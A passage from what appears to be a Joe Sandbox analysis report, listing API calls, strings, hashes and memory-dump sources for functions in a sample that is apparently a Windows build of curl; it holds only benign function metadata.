                                    • Opcode ID: d129823425aba761ab8a9ae50f97e268488bb4f58ec5709f6179af16f0332e0f
                                    • Instruction ID: 99dd432ab7dacb78a184d734e7a6cafdd715fd4151d464ea4bde1a29054ce647
                                    • Opcode Fuzzy Hash: d129823425aba761ab8a9ae50f97e268488bb4f58ec5709f6179af16f0332e0f
                                    • Instruction Fuzzy Hash: A5213633604622CFDB1C2F25BC2827E3795EF457A2724556AE841F73A6CFA45C094690
                                    Function 00E0923B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                    • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00E09282
                                      • Part of subcall function 00E0F352: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 00E0F58A
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(000000FF), ref: 00E0930A
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E09311
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E09319
                                      • Part of subcall function 00E10B16: _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100,00000180,?,00E02077,?,00008501,00000180), ref: 00E10B2D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func_close_fileno_fstat64_openfree
                                    • String ID: CURLOPT_INFILESIZE_LARGE$Can't open '%s'!
                                    • API String ID: 440421868-219864042
                                    • Opcode ID: ebbd2d5d88af8ef4ec1d0245150d9cb3115cb1b22377339e4330a34480b7d332
                                    • Instruction ID: 12226bcb5f5bc1c33f5e55f464b5fef363ab99d3833d8d4c7d42a20d61420d15
                                    • Opcode Fuzzy Hash: ebbd2d5d88af8ef4ec1d0245150d9cb3115cb1b22377339e4330a34480b7d332
                                    • Instruction Fuzzy Hash: C9212632601700AFDB289F64ED42AAAB3E5EF08325B10291DF456B35E2DB70BC858B10
                                    Function 00E52537 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,?,00E525F8,?,?,00E6F464,00000000,?,00E52723,00000004,InitializeCriticalSectionEx,00E5627C,InitializeCriticalSectionEx,00000000), ref: 00E525C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID: api-ms-
                                    • API String ID: 3664257935-2084034818
                                    • Opcode ID: ed6e7f35d080d478eaf9168ddd0c31f5b50f9e459ee042a300d04365046e91a4
                                    • Instruction ID: 0d116690f4cfabf119f0801a7d433ad65d445035051718ecbe780d7594826b78
                                    • Opcode Fuzzy Hash: ed6e7f35d080d478eaf9168ddd0c31f5b50f9e459ee042a300d04365046e91a4
                                    • Instruction Fuzzy Hash: E211C632A01B20AFDB224B699C61B5937A4AF02777F541928FF01F72C0E770ED0886D2
                                    Function 00E0305C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • SearchPathA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0(00000000,curl-ca-bundle.crt,00000000,00000104,?,?), ref: 00E030AB
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E030BD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E030CA
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E030DD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00E030E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree$PathSearch
                                    • String ID: curl-ca-bundle.crt
                                    • API String ID: 4109318298-694051528
                                    • Opcode ID: e4263f78327b8a9c4550a52dda1a48c343fae97e506e1a2c6e7b23ce1afc473d
                                    • Instruction ID: f38083f8a80b64b9de1e26ba5c005e127f00291b84608ac8988095eef6d5a761
                                    • Opcode Fuzzy Hash: e4263f78327b8a9c4550a52dda1a48c343fae97e506e1a2c6e7b23ce1afc473d
                                    • Instruction Fuzzy Hash: D211C1755057089FDB209F74AC85ADBB7BCEB4571AF00056EE885B3681DBB0AD888E10
                                    Function 00E08E58 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,00E0900B), ref: 00E08E64
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E0900B), ref: 00E08E7F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,error initializing curl library,?,00E0900B), ref: 00E08ECE
                                    Strings
                                    • error initializing curl library, xrefs: 00E08EC0
                                    • error retrieving curl library information, xrefs: 00E08EB9
                                    • error initializing curl, xrefs: 00E08ED9
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcfreemalloc
                                    • String ID: error initializing curl$error initializing curl library$error retrieving curl library information
                                    • API String ID: 2771806388-2118345949
                                    • Opcode ID: a4007b6054ca6e7fa8af263058039ad492d28bc801969202af79a78db35745ef
                                    • Instruction ID: a695c9d10b646305045e0dab5857ef4250139cbf9d1bb4e7c2457cbbfc4f47ea
                                    • Opcode Fuzzy Hash: a4007b6054ca6e7fa8af263058039ad492d28bc801969202af79a78db35745ef
                                    • Instruction Fuzzy Hash: A3014976200B01DFD325AF14ED0A5177BF0EF40321B10292EE4C6B67D2DFB0A4858711
                                    Function 00E215C6 Relevance: 10.1, APIs: 8, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,766B3C50,00000000,00E217E1,00E08BF9), ref: 00E215DF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E215FE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2161B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21638
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21655
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21672
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2168F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E216AC
                                      • Part of subcall function 00E15D80: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E15D9B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: f01d18a7a01f6748209b4edfd8819a63eb2fcc3e739380c2631adc6942c89825
                                    • Instruction ID: 74f673a025aa120a8d5c4a3b2590ff0aefe165277fc93b41c246cf9e00c7ffd3
                                    • Opcode Fuzzy Hash: f01d18a7a01f6748209b4edfd8819a63eb2fcc3e739380c2631adc6942c89825
                                    • Instruction Fuzzy Hash: 1421AA32624616EFEB4C6F35FC5899DFBA5FF48251B10862BD419A3261CFB42C189F90
                                    Function 00E2F35E Relevance: 9.3, APIs: 6, Instructions: 269networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WSASetLastError.WS2_32(00002726,00000000,00000000,00000000), ref: 00E2F506
                                    • __aulldvrm.LIBCMT ref: 00E2F55C
                                    • select.WS2_32(00000100,?,?,?,?), ref: 00E2F5E9
                                    • __WSAFDIsSet.WS2_32(000000FF,?), ref: 00E2F623
                                    • __WSAFDIsSet.WS2_32(000000FF,?), ref: 00E2F65B
                                    • __WSAFDIsSet.WS2_32(000000FF,?), ref: 00E2F679
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLast__aulldvrmselect
                                    • String ID:
                                    • API String ID: 1566158641-0
                                    • Opcode ID: b8537f5c9718b259ccbc0696672d78471e81ea6463ec3b78b1db630b4f15831d
                                    • Instruction ID: 1220a94d66a926c182660f73f9af7f8b10f33539981824693d349493a5263956
                                    • Opcode Fuzzy Hash: b8537f5c9718b259ccbc0696672d78471e81ea6463ec3b78b1db630b4f15831d
                                    • Instruction Fuzzy Hash: 7AA18370A002398BDB399F29E8806AAB7F9FF58315F5055BEE859F6250D770DE818F40
                                    Function 00E4FB62 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 247COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E4ADF2: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 00E4AE0A
                                      • Part of subcall function 00E4ADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AE21
                                      • Part of subcall function 00E4ADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E4AE3D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,00E4B2F1,?), ref: 00E4FBFD
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,00E4B2F1,?), ref: 00E4FC53
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00E4B2F1,?,?,?,00000000), ref: 00E4FCA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callocfree$_strdupmalloc
                                    • String ID: GSSAPI handshake failure (empty challenge message)$Kerberos$SSPI: couldn't get auth info
                                    • API String ID: 3060414022-4232989830
                                    • Opcode ID: 46fdbbae224812335edbbe912129d5849cb3d7b4d4cb4dfd434e4fb5da157152
                                    • Instruction ID: a9e077011a4d43a6701718758a3d93338e0c8ecb7212b3e32feb0d51d5fbfe18
                                    • Opcode Fuzzy Hash: 46fdbbae224812335edbbe912129d5849cb3d7b4d4cb4dfd434e4fb5da157152
                                    • Instruction Fuzzy Hash: E4919E71A0061AAFDB14CF55E894BAEBBF4FF08715F14852AE809F7290DB70AC44CB90
                                    Function 00E24E84 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 215COMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24EE0
                                    Strings
                                    • Failed to resolve host '%s' with timeout after %ld ms, xrefs: 00E25016
                                    • Could not resolve host: %s, xrefs: 00E2504D
                                    • Couldn't resolve proxy '%s', xrefs: 00E250E9
                                    • Unix socket path too long: '%s', xrefs: 00E24F20
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: calloc
                                    • String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %ld ms$Unix socket path too long: '%s'
                                    • API String ID: 2635317215-2215122109
                                    • Opcode ID: 16ed10c0cf94dc394917be307331bc40cb20b66a2b559f6e7b8a065f6fe54d3d
                                    • Instruction ID: 91e71d414b29535db5b880934781cfe25c83c5abd6ca4bd6d55daee975180407
                                    • Opcode Fuzzy Hash: 16ed10c0cf94dc394917be307331bc40cb20b66a2b559f6e7b8a065f6fe54d3d
                                    • Instruction Fuzzy Hash: 7871F372E08A25AFEF119F68EC42FAE7BB1AF41350F1450A5EC04BF2D1DAB15C048B91
                                    Function 00E2BED0 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 212COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2BEFF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2BF35
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C00C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C161
                                      • Part of subcall function 00E1A7F6: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 00E1A80D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: No URL set$User-Agent: %s
                                    • API String ID: 1294909896-339178133
                                    • Opcode ID: 756155b7cdd2215c7653aef2941b42a132b08f6bae90bb591d2e23d5ab916458
                                    • Instruction ID: b19c94ba5b0185d133e03dce849770b5d76d56c3232d1543083470f92df5639d
                                    • Opcode Fuzzy Hash: 756155b7cdd2215c7653aef2941b42a132b08f6bae90bb591d2e23d5ab916458
                                    • Instruction Fuzzy Hash: 739189316052618FDF158F68E8C0BE93BA1AF49314F2C52BADC59AF28BDB705941CB71
                                    Function 00E460A0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 198COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E462F0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4632C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E46356
                                    Strings
                                    • schannel: shutting down SSL/TLS connection with %s port %hu, xrefs: 00E46118
                                    • schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 00E462AE
                                    • schannel: ApplyControlToken failure: %s, xrefs: 00E461B9
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
                                    • API String ID: 1294909896-1242988243
                                    • Opcode ID: f5c4378916ff83e1708cc3943dcac7c21f44360b7b1ad7049e4cb5e668314383
                                    • Instruction ID: bd0e1e23e865c1cc2e3635a561e742bb4939a25151aa6ea49c360435d27a0f0d
                                    • Opcode Fuzzy Hash: f5c4378916ff83e1708cc3943dcac7c21f44360b7b1ad7049e4cb5e668314383
                                    • Instruction Fuzzy Hash: 50817E71900229EFCB25DF14EC44BD9BBB5FF09315F0041A9E849A7261D7B4AE98CF91
                                    Function 00E493A7 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 191COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
                                    • API String ID: 0-4260076447
                                    • Opcode ID: 63dd3f51df7eb1c1a218a2a2e201dcd7bdf4f4c2d172e23ec583bad8a2670998
                                    • Instruction ID: dc0a9da401ebcea52edaad7d49ee5c6e77439759b901097a7bce81949a739ab4
                                    • Opcode Fuzzy Hash: 63dd3f51df7eb1c1a218a2a2e201dcd7bdf4f4c2d172e23ec583bad8a2670998
                                    • Instruction Fuzzy Hash: 6171BF70A012149FDB24DF24EC99BAAB3F5EF44314F2051ADE419BB292DB746E85CF50
                                    Function 00E4A885 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4ABCC
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4ABFD
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4AC1F
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AC36
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AC50
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,y,00E40F4D,?,?,y,?,?,00000000,?,?,?,00E30B5D), ref: 00E4A8FF
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,y,00E40F4D,?,?,y,?,?,00000000,?,?,?,00E30B5D,?), ref: 00E4A94A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$callocmalloc
                                    • String ID: NTLM$SSPI: couldn't get auth info$y
                                    • API String ID: 1437353635-2588018048
                                    • Opcode ID: f71f165426abfc1ff443f9502027be30f5b6dad558d935c79fdc10a8c4d19bef
                                    • Instruction ID: 90d7d5693937153e09afbe5f8b9d9fa700d8b41f107229bd96619ded3647a78f
                                    • Opcode Fuzzy Hash: f71f165426abfc1ff443f9502027be30f5b6dad558d935c79fdc10a8c4d19bef
                                    • Instruction Fuzzy Hash: 8551A371644609AFDB04DF55FD949AE7BE8FF48364B185029E809B3290DB70AD04CF91
                                    Function 00E31EB9 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 164COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E15DA0: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E233F9), ref: 00E15DB7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31FCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callocfree
                                    • String ID: ;type=$;type=%c$?%s$ftp$http
                                    • API String ID: 306872129-3547414
                                    • Opcode ID: ae9cbb5107f202cdd29e24fe4e1322f4cbc1aed31a7eb2b23d9f38b8c2e56331
                                    • Instruction ID: 93d19bba496181fc8a89afe27ddda4d28f35257219e3240121d10c360288f7af
                                    • Opcode Fuzzy Hash: ae9cbb5107f202cdd29e24fe4e1322f4cbc1aed31a7eb2b23d9f38b8c2e56331
                                    • Instruction Fuzzy Hash: FB4114317046016BEB3897259C5EBAA2FE6DFC4764F24606DE948BB281EF20DC85C660
                                    Function 00E40BB3 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000009B8,?,?,00E30F95,?,?,00000000,?), ref: 00E40C78
                                    Strings
                                    • NTLM handshake failure (empty type-2 message), xrefs: 00E40C52
                                    • NTLM handshake rejected, xrefs: 00E40CF3
                                    • NTLM auth restarted, xrefs: 00E40C10
                                    • NTLM handshake failure (internal error), xrefs: 00E40D1C
                                    • NTLM, xrefs: 00E40BD1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (empty type-2 message)$NTLM handshake failure (internal error)$NTLM handshake rejected
                                    • API String ID: 2803490479-2228421627
                                    • Opcode ID: a06950ff649ca976f06e9b32f838402e9ce3b8f01ec8486e50fefaf249736bc8
                                    • Instruction ID: c8b33e156cf85d5c102db66200d6896a2fb3d11629a5af6148609c0f51deb792
                                    • Opcode Fuzzy Hash: a06950ff649ca976f06e9b32f838402e9ce3b8f01ec8486e50fefaf249736bc8
                                    • Instruction Fuzzy Hash: A9412131A44306EFDB14DF68E8D1AA9B7E4AF44314F20243EE602B7282EB719D48CB50
                                    Function 00E416F0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 109COMMON
                                    Download Yara Rule
                                    Strings
                                    • Mime-Version: 1.0, xrefs: 00E41771
                                    • Cannot APPEND with unknown input file size, xrefs: 00E417CF
                                    • Cannot APPEND without a mailbox., xrefs: 00E41701
                                    • APPEND %s (\Seen) {%I64d}, xrefs: 00E4180B
                                    • Mime-Version, xrefs: 00E4175A
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Mime-Version$Mime-Version: 1.0
                                    • API String ID: 0-3307439731
                                    • Opcode ID: f22fe58649079072ae50b5ab467679f4346842be06c1cf1f43628fbd1f830b4a
